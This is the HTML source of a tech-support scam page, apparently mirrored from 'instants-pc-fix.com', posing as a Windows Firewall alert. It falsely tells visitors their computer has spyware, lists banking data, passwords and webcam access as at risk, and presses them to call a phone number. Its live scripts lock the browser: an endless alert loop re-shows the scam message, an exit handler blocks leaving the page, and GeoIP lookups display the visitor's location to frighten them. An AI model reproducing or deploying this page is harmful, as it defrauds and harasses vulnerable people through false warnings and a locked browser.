
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Windows Firewall warning!</title>

<style type="text/css">
div#container
{
   width: 688px;
   position: relative;
   margin: 0 auto 0 auto;
   text-align: left;
}
body
{
   background-color: #FFFFFF;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
   margin: 0;
   text-align: center;
}
</style>
<style type="text/css">
a
{
   color: #0000FF;
   text-decoration: underline;
}
a:visited
{
   color: #800080;
}
a:active
{
   color: #FF0000;
}
a:hover
{
   color: #0000FF;
   text-decoration: underline;
}
</style>
<style type="text/css">
#wb_Text1 
{
   background-color: transparent;
   border: 0px #000000 solid;
   padding: 0;
   text-align: left;
}
#wb_Text1 div
{
   text-align: left;
}
#Image1
{
   border: 0px #000000 solid;
}
#wb_Text2 
{
   background-color: transparent;
   border: 0px #000000 solid;
   padding: 0;
   text-align: left;
}
#wb_Text2 div
{
   text-align: left;
}
#wb_Text3 
{
   background-color: transparent;
   border: 0px #000000 solid;
   padding: 0;
   text-align: left;
}
#wb_Text3 div
{
   text-align: left;
}
#wb_Text4 
{
   background-color: transparent;
   border: 0px #000000 solid;
   padding: 0;
   text-align: left;
}
#wb_Text4 div
{
   text-align: left;
}
#wb_Text5 
{
   background-color: transparent;
   border: 0px #000000 solid;
   padding: 0;
   text-align: left;
}
#wb_Text5 div
{
   text-align: left;
}
#wb_Text6 
{
   background-color: transparent;
   border: 0px #000000 solid;
   padding: 0;
   text-align: left;
}
#wb_Text6 div
{
   text-align: left;
}
#wb_Text7 
{
   background-color: transparent;
   border: 0px #000000 solid;
   padding: 0;
   text-align: center;
}
#wb_Text7 div
{
   text-align: center;
}
#wb_Text8 
{
   background-color: transparent;
   border: 0px #000000 solid;
   padding: 0;
   text-align: center;
}
#wb_Text8 div
{
   text-align: center;
}
#wb_Text9 
{
   background-color: transparent;
   border: 0px #000000 solid;
   padding: 0;
   text-align: left;
}
#wb_Text9 div
{
   text-align: left;
}
#wb_Text10 
{
   background-color: transparent;
   border: 0px #000000 solid;
   padding: 0;
   text-align: left;
}
#wb_Text10 div
{
   text-align: left;
}
#wb_Text11 
{
   background-color: transparent;
   border: 0px #000000 solid;
   padding: 0;
   text-align: left;
}
#wb_Text11 div
{
   text-align: left;
}
#Image2
{
   border: 0px #000000 solid;
}
#Image3
{
   border: 0px #000000 solid;
}
</style>
<script type="text/javascript">
    alert("(1) Windows Firewall warning:\nYOUR COMPUTER HAS ADWARE / SPYWARE VIRUS \n\nCall 844-334-9750 immediately for assistance on how to remove the virus. The call is toll-free.\n\nPossible network damages if virus not removed immediately:\n$21,800 - $84,430\n\nDATA AT RISK:\n1. Your credit card details and banking information\n2. Your e-mail passwords and other account passwords\n3. Your Facebook, Skype, AIM, ICQ and other chat logs\n4. Your private photos, family photos and other sensitive files\n5. Your webcam could be accessed remotely by stalkers with a VPN virus\n\n MORE ABOUT THE VIRUS:\nSeeing these pop-up's means that you have a virus installed on your computer which puts the security of your personal data at a serious risk. It's strongly advised that you call the number above and get your computer fixed before you continue using your internet, especially for shopping.\n\nCall 844-334-9750 immediately for assistance on how to remove the virus. The call is toll-free.");

</script>

</head>
<body>


<script language="JavaScript" src="../j.maxmind.com/app/geoip.html"></script>
<div id="container">
<div id="wb_Shape3" style="position:absolute;left:400px;top:134px;width:286px;height:457px;z-index:0;">
<img src="images/img0002.png" id="Shape3" alt="" style="border-width:0;width:286px;height:457px;"></div>
<div id="wb_Shape2" style="position:absolute;left:0px;top:134px;width:394px;height:457px;z-index:1;">
<img src="images/img0003.png" id="Shape2" alt="" style="border-width:0;width:394px;height:457px;"></div>
<div id="wb_Shape1" style="position:absolute;left:0px;top:5px;width:686px;height:124px;z-index:2;">
<img src="images/img0001.png" id="Shape1" alt="" style="border-width:0;width:686px;height:124px;"></div>
<div id="wb_Text1" style="position:absolute;left:78px;top:40px;width:607px;height:32px;z-index:3;text-align:left;">
<span style="color:#FF0000;font-family:Arial;font-size:24px;"><strong>YOUR COMPUTER HAS ADWARE / SPYWARE VIRUS</strong></span></div>
<div id="wb_Image1" style="position:absolute;left:13px;top:29px;width:53px;height:43px;z-index:4;">
<img src="images/warning2.png" id="Image1" alt="" style="width:53px;height:43px;"></div>
<div id="wb_Text2" style="position:absolute;left:82px;top:77px;width:107px;height:18px;z-index:5;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:15px;"><strong>Your location:</strong></span></div>
<div id="wb_Text3" style="position:absolute;left:334px;top:77px;width:183px;height:18px;z-index:6;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:15px;"><strong>Your IP address:</strong></span></div>
<div id="wb_Text4" style="position:absolute;left:539px;top:77px;width:80px;height:18px;z-index:7;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:15px;"><strong>Date:</strong></span></div>
<div id="Html1" style="position:absolute;left:337px;top:97px;width:166px;height:24px;z-index:8">
<script>document.write(geoip_ip());</script>
</div>
<div id="Html2" style="position:absolute;left:85px;top:97px;width:238px;height:33px;z-index:9">
<script>document.write(geoip_city());</script>, <script language="JavaScript">document.write(geoip_region_name());</script></div>
<div id="wb_JavaScript1" style="position:absolute;left:539px;top:97px;width:138px;height:30px;z-index:10;">
<div style="color:#000000;font-size:12px;font-family:Arial;font-weight:normal;font-style:normal;text-decoration:none" id="basicdate"></div>
<script type="text/javascript">
   var now = new Date();
   var days = new Array('Sunday','Monday','Tuesday','Wednesday','Thursday','Friday','Saturday');
   var months = new Array('January','February','March','April','May','June','July','August','September','October','November','December');
   var date = ((now.getDate() < 10) ? "0" : "") + now.getDate();
   var year = (now.getYear() < 1000) ? now.getYear() + 1900 : now.getYear();
   today = days[now.getDay()] + ", " + months[now.getMonth()] + " " + date + ", " + year;
   var basicdate = document.getElementById('basicdate');
   basicdate.innerHTML = today;
</script>


</div>

<div id="wb_Text5" style="position:absolute;left:243px;top:10px;width:257px;height:19px;z-index:12;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:16px;"><strong><u>(</u></strong></span><span style="color:#FF0000;font-family:Arial;font-size:16px;"><strong><u>1</u></strong></span><span style="color:#000000;font-family:Arial;font-size:16px;"><strong><u>) Windows Firewall warning:</u></strong></span></div>
<div id="wb_Text6" style="position: absolute; left: 12px; top: 198px; width: 374px; height: 79px; z-index: 13; text-align: left;">
<span style="color:#000000;font-family:Arial;font-size:25px;">Call <b><span style="background:#FF0">844-334-9750</span></b> <strong>immediately </strong></span><span style="color:#000000;font-family:Arial;font-size:20px;">for assistance on how to remove the virus<br>The call is toll-free.</span></div>
<div id="wb_Text7" style="position:absolute;left:426px;top:156px;width:242px;height:60px;text-align:center;z-index:14;">
<span style="color:#000000;font-family:Arial;font-size:17px;">Possible network damages if virus not removed immediately: </span><span style="color:#000000;font-family:Arial;font-size:19px;"><br></span><span style="color:#FF0000;font-family:Arial;font-size:19px;"><strong>$21,800 - $84,430</strong></span></div>
<div id="wb_Text8" style="position:absolute;left:421px;top:246px;width:253px;height:303px;text-align:center;z-index:15;">
<span style="color:#000000;font-family:Arial;font-size:16px;">DATA AT RISK:<br><strong>1. Your credit card details and banking information<br><br>2. Your e-mail passwords and other account passwords<br><br>3. Your Facebook, Skype, AIM, ICQ and other chat logs<br><br>4. Your private photos, family photos and other sensitive files<br><br>5. Your webcam could be accessed remotely by stalkers with a VPN virus</strong></span></div>
<div id="wb_Text9" style="position:absolute;left:15px;top:148px;width:320px;height:33px;z-index:16;text-align:left;">
<span style="color:#000000;font-family:'Arial Black';font-size:24px;">What to do:</span></div>
<div id="wb_Text10" style="position:absolute;left:15px;top:309px;width:320px;height:33px;z-index:17;text-align:left;">
<span style="color:#000000;font-family:'Arial Black';font-size:24px;">More about the virus:</span></div>
<div id="wb_Text11" style="position:absolute;left:18px;top:352px;width:339px;height:133px;z-index:18;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:17px;">Seeing these pop-up's means that you may have a virus installed on your computer which puts the security of your personal data at a serious risk. It's strongly advised that you call the number above and get your computer fixed before you continue using your internet, especially for shopping.</span></div>
<div id="wb_Image2" style="position:absolute;left:37px;top:509px;width:291px;height:71px;z-index:19;">
<img src="images/bottom2.png" id="Image2" alt="" style="width:291px;height:71px;"></div>
<div id="wb_Image3" style="position:absolute;left:209px;top:8px;width:27px;height:26px;z-index:20;">
<img src="images/windows-firewall.png" id="Image3" alt="" style="width:27px;height:26px;"></div>
<div id="Html4" style="position:absolute;left:222px;top:605px;width:276px;height:29px;z-index:21">
</div>
</div>
<script type="text/javascript">
setTimeout(function() {for(i = 10; i >0; i++){
    alert("(1) Windows Firewall warning:\nYOUR COMPUTER HAS ADWARE / SPYWARE VIRUS \n\nCall 844-334-9750 immediately for assistance on how to remove the virus. The call is toll-free.\n\nPossible network damages if virus not removed immediately:\n$21,800 - $84,430\n\nDATA AT RISK:\n1. Your credit card details and banking information\n2. Your e-mail passwords and other account passwords\n3. Your Facebook, Skype, AIM, ICQ and other chat logs\n4. Your private photos, family photos and other sensitive files\n5. Your webcam could be accessed remotely by stalkers with a VPN virus\n\n MORE ABOUT THE VIRUS:\nSeeing these pop-up's means that you have a virus installed on your computer which puts the security of your personal data at a serious risk. It's strongly advised that you call the number above and get your computer fixed before you continue using your internet, especially for shopping.\n\nCall 844-334-9750 immediately for assistance on how to remove the virus. The call is toll-free.");
}}, 100);
</script>

<script type="text/javascript">
function goodbye(e) {
	if(!e) e = window.event;
	//e.cancelBubble is supported by IE - this will kill the bubbling process.
	e.cancelBubble = true;
	e.returnValue = 'Windows Firewall warning: \nYOUR COMPUTER HAS ADWARE / spyware virus \n\nCall 844-334-9750 immediately for assistance on how to remove the virus. The call is toll-free.\n\nIf you indeed have already called, then you can peacefully proceed to close this window. \n\nWe wish you secure & fast internet browsing for the future!'; //This is displayed on the dialog

	//e.stopPropagation works in Firefox.
	if (e.stopPropagation) {
		e.stopPropagation();
		e.preventDefault();
	}
}
window.onbeforeunload=goodbye;
</script>

</body>

<!-- Mirrored from instants-pc-fix.com/x4-1/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 19 Dec 2014 17:44:22 GMT -->
</html>